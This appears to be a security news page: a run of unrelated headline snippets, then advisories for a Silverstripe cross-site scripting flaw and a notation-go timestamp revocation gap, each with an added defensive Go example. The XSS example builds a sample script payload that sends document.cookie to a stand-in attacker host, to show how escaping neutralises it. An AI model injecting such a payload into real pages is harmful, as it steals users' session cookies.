Tag
#ios
Introduction

Microsoft engineering teams use the Security Development Lifecycle to ensure our products are built in alignment with Microsoft’s Secure Future Initiative security principles: Secure by Design, Secure by Default, and Secure Operations. A key component of the Security Development Lifecycle is security testing, which aims to discover and mitigate security vulnerabilities before adversaries can exploit them.
FortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn…
The stolen firewall data is thorough but now more than two years old, so most organizations that follow even basic security practices should face minimal risk.
A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...
By staying vigilant, agile, and prepared, organizations can turn threat detection, investigation, and response (TDIR) from a defensive strategy into a proactive enabler of security and operational excellence.
CVE-2024-44243, a critical macOS vulnerability discovered recently by Microsoft, can allow attackers to bypass Apple’s System Integrity Protection…
In some cases, form messages can contain HTML markup. This is an intentional feature, allowing links and other relevant HTML markup for the given message. Some form messages include content that the user can provide. There are scenarios in the CMS where that user-provided content is not correctly sanitised before it is included in the form message, so it is rendered as markup rather than text, resulting in a cross-site scripting (XSS) vulnerability.

### References
- https://www.silverstripe.org/download/security-releases/cve-2024-53277

## Reported by
Leo Diamat from [Bastion Security Group](http://www.bastionsecurity.co.nz/)
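The pattern the advisory describes, shown as an added example that is not Silverstripe's code: a form message whose markup (a link) is intentional and trusted, with a user-supplied name spliced into it. The message text, the `/account` link and the attacker input are all constructed for the example; the vulnerable builder interpolates the name as-is, the hardened one routes it through Go's contextual `html/template`, which escapes it for the text position it lands in while leaving the intended link untouched.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
)

// Trusted, intentional markup: the message is allowed to carry a link.
// Only the user-supplied name must never be interpreted as markup.
// (Constructed message; not a Silverstripe template.)
const markup = `<p>Thanks, %s. <a href="/account">View your account</a></p>`

// vulnerableFormMessage splices the user-controlled value straight into
// the markup, so a name containing tags becomes part of the page.
func vulnerableFormMessage(userName string) string {
	return fmt.Sprintf(markup, userName)
}

// safeTmpl keeps the same trusted markup but passes the user value through
// html/template, which HTML-escapes it in this text context: the link
// survives, injected tags are rendered as literal text.
var safeTmpl = template.Must(template.New("msg").Parse(
	`<p>Thanks, {{.Name}}. <a href="/account">View your account</a></p>`))

// safeFormMessage renders the trusted markup with the user value escaped.
func safeFormMessage(userName string) (string, error) {
	var buf bytes.Buffer
	if err := safeTmpl.Execute(&buf, struct{ Name string }{userName}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	// Constructed attacker input: a name that carries a script tag.
	payload := `Mallory<script>fetch("https://attacker.invalid/?c="+document.cookie)</script>`
	fmt.Println("vulnerable:", vulnerableFormMessage(payload))
	safe, err := safeFormMessage(payload)
	if err != nil {
		panic(err)
	}
	fmt.Println("safe:      ", safe)
}
```

The fix is to escape at the point where untrusted data enters trusted markup, not to strip tags from the whole message (which would also remove the intentional link). If the user value ever lands inside an attribute or a script block instead of text, the escaping rules differ; a contextual template engine handles that, a single `htmlspecialchars`-style call on the way in does not.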
An insurance company is accused of unlawfully collecting, using, and selling location data from millions of people's cell phones.
This issue was identified during Quarkslab's audit of the timestamp feature.

### Summary
During timestamp signature generation, the revocation status of the certificate(s) used to generate the timestamp signature was not verified.

### Details
During timestamp signature generation, notation-go did not check the revocation status of the certificate chain used by the TSA. This oversight creates a vulnerability that could be exploited through a Man-in-The-Middle attack. An attacker could potentially use a revoked intermediate or leaf certificate (for example, one whose key has been compromised) to generate a malicious countersignature, which would then be accepted and stored by `notation`.

### Impact
This could lead to denial of service scenarios, particularly in CI/CD environments: because the stored timestamp signature chains to a revoked certificate, later signature verification would fail, potentially disrupting operations.
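The missing step, as an added Go example that is not notation-go's code: after ordinary path validation of the TSA certificate chain (which `crypto/x509` does but which never consults revocation data), walk the chain and reject it if any non-root certificate is listed in a current, issuer-signed CRL, and fail closed when no usable CRL is at hand. The PKI is constructed inline (a root, two TSA leaves, a CRL revoking one of them); the function names, error values and the CRL-freshness policy are this example's own assumptions, and OCSP, which a real verifier would also support, is out of scope here.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

var (
	ErrRevoked = errors.New("certificate is revoked")
	ErrNoCRL   = errors.New("no current, issuer-signed CRL available")
)

// checkChainRevocation walks a validated chain (leaf first, root last) and
// rejects it if any non-root certificate is listed in a CRL that the next
// certificate up the chain signed and that is current at `now`. A missing or
// stale CRL is also an error: the check fails closed.
func checkChainRevocation(chain []*x509.Certificate, crls []*x509.RevocationList, now time.Time) error {
	for i := 0; i+1 < len(chain); i++ {
		cert, issuer := chain[i], chain[i+1]
		var crl *x509.RevocationList
		for _, c := range crls {
			if bytes.Equal(c.RawIssuer, issuer.RawSubject) && c.CheckSignatureFrom(issuer) == nil &&
				!now.Before(c.ThisUpdate) && now.Before(c.NextUpdate) {
				crl = c
				break
			}
		}
		if crl == nil {
			return fmt.Errorf("%w: issuer %q", ErrNoCRL, issuer.Subject.CommonName)
		}
		for _, rc := range crl.RevokedCertificates { // RevokedCertificateEntries on Go >= 1.21
			if rc.SerialNumber.Cmp(cert.SerialNumber) == 0 {
				return fmt.Errorf("%w: %q serial %s", ErrRevoked, cert.Subject.CommonName, cert.SerialNumber)
			}
		}
	}
	return nil
}

// pathValidationOnly is what crypto/x509 gives on its own: the chain builds
// to a trusted root and the TSA EKU matches, but CRLs are never consulted.
func pathValidationOnly(leaf *x509.Certificate, roots *x509.CertPool, now time.Time) ([]*x509.Certificate, error) {
	chains, err := leaf.Verify(x509.VerifyOptions{Roots: roots, CurrentTime: now,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageTimeStamping}})
	if err != nil {
		return nil, err
	}
	return chains[0], nil
}

// verifyTSA adds the step the advisory says was missing: revocation after path validation.
func verifyTSA(leaf *x509.Certificate, roots *x509.CertPool, crls []*x509.RevocationList, now time.Time) error {
	chain, err := pathValidationOnly(leaf, roots, now)
	if err != nil {
		return err
	}
	return checkChainRevocation(chain, crls, now)
}

// scenario is a constructed PKI: one root, two TSA leaves, a CRL revoking one leaf.
type scenario struct {
	goodTSA, revokedTSA *x509.Certificate
	roots               *x509.CertPool
	crls                []*x509.RevocationList
}

func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

func buildScenario() scenario {
	now := time.Now()
	tmpl := func(serial int64, cn string, ca bool) *x509.Certificate {
		c := &x509.Certificate{SerialNumber: big.NewInt(serial), Subject: pkix.Name{CommonName: cn},
			NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
			KeyUsage: x509.KeyUsageDigitalSignature, ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageTimeStamping}}
		if ca { // a CRL issuer needs the cRLSign bit or CheckSignatureFrom rejects its CRLs
			c.IsCA, c.BasicConstraintsValid, c.ExtKeyUsage = true, true, nil
			c.KeyUsage = x509.KeyUsageCertSign | x509.KeyUsageCRLSign
		}
		return c
	}
	caKey := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
	caTmpl := tmpl(1, "Constructed TSA Root", true)
	ca := must(x509.ParseCertificate(must(x509.CreateCertificate(rand.Reader, caTmpl, caTmpl, &caKey.PublicKey, caKey))))
	leaf := func(serial int64, cn string) *x509.Certificate {
		k := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
		return must(x509.ParseCertificate(must(x509.CreateCertificate(rand.Reader, tmpl(serial, cn, false), ca, &k.PublicKey, caKey))))
	}
	good, revoked := leaf(2, "Constructed TSA (good)"), leaf(3, "Constructed TSA (revoked)")
	crlDER := must(x509.CreateRevocationList(rand.Reader, &x509.RevocationList{
		Number: big.NewInt(1), ThisUpdate: now.Add(-time.Minute), NextUpdate: now.Add(time.Hour),
		RevokedCertificates: []pkix.RevokedCertificate{{SerialNumber: revoked.SerialNumber, RevocationTime: now.Add(-time.Minute)}},
	}, ca, caKey))
	roots := x509.NewCertPool()
	roots.AddCert(ca)
	return scenario{goodTSA: good, revokedTSA: revoked, roots: roots, crls: []*x509.RevocationList{must(x509.ParseRevocationList(crlDER))}}
}

func main() {
	s, now := buildScenario(), time.Now()
	_, err := pathValidationOnly(s.revokedTSA, s.roots, now)
	fmt.Println("path validation only, revoked TSA: ", err) // nil: the revoked leaf is accepted
	fmt.Println("with revocation check, revoked TSA:", verifyTSA(s.revokedTSA, s.roots, s.crls, now))
	fmt.Println("with revocation check, good TSA:   ", verifyTSA(s.goodTSA, s.roots, s.crls, now))
	fmt.Println("with revocation check, no CRL:     ", verifyTSA(s.goodTSA, s.roots, nil, now))
}
```

The check runs at signing time, before the countersignature is stored, which is where the advisory places the gap: a verifier that only checks revocation later turns a revoked TSA certificate into a stored signature that fails in CI/CD rather than a refused timestamp at the point it could still be retried against another TSA. Whether to fail closed on a missing CRL is a policy decision; this example does, and the error type lets a caller distinguish that case from an actual revocation.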